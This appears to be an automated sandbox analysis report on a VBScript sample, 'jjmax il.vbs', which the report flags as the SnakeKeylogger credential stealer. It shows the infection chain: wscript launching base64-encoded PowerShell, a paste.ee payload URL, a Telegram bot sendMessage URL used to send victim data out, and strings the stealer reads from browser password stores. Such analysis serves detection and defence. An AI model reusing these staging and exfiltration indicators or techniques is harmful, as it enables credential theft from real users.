                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:088753%0D%0ADate%20a
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.0000000003379000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.0000000003379000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en4
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.000000000336A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enh
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.0000000003374000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAF64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/dahall/taskscheduler
                  Source: jjmax il.vbs | String found in binary or memory: https://github.com/koswald/VBScript
                  Source: wscript.exe, 00000000.00000003.1262818656.000002480F411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1261915374.000002480D3D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1259928174.000002480EE11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1259471357.000002480EE3E000.00000004.00000020.00020000.00000000.sdmp, jjmax il.vbs | String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
                  Source: wscript.exe, 00000000.00000003.1262408779.000002480F311000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262545228.000002480F36B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262818656.000002480F411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1261915374.000002480D3D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1259471357.000002480EE3E000.00000004.00000020.00020000.00000000.sdmp, jjmax il.vbs | String found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CC9C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CC9C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/QX
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CC9C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/QXyRXYmm/0
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.0000000003231000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.0000000003231000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.000000000325C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.000000000339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000033AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.000000000339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/h
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000033A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownHTTPS traffic detected: 193.30.119.105:443 -> 192.168.2.7:49699 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49803 version: TLS 1.2

                  System Summary

                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Initial file: Dim cmd 'string: ShellExecute arg #1
                  Source: Initial file: Dim args 'string: ShellExecute arg #2
                  Source: Initial file: Dim pwd 'string: ShellExecute arg #3
                  Source: Initial file: Dim privileges 'string: ShellExecute arg #4
                  Source: Initial file: .ShellExecute cmd, args, pwd, privileges
                  Source: Initial file: Dim cmd 'string: ShellExecute arg #1
                  Source: Initial file: 'Class scope: args_ 'string: ShellExecute arg #2
                  Source: Initial file: Dim pwd 'string: ShellExecute arg #3
                  Source: Initial file: Dim privileges 'string: ShellExecute arg #4
                  Source: Initial file: .ShellExecute cmd, args_, pwd, privileges
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAC5AA80D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAC5AA2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FED278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FE5370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FEA088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FEC146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FE7118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FEC738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FEC468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FECA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FE69A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FEE988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FECFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FECCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FE3AA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FE29EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FE39ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FEE97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FEF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_02FE3E09
                  Source: jjmax il.vbs | Initial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 2968
                  Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 2968
                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@8/3@7/6
                  Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\VBScripting
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofuv52uo.jql.ps1
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs"
                  Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.0000000003493000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.0000000003450000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.000000000346E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.0000000003460000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: jjmax il.vbs | Virustotal: Detection: 18%
                  Source: jjmax il.vbs | ReversingLabs: Detection: 13%
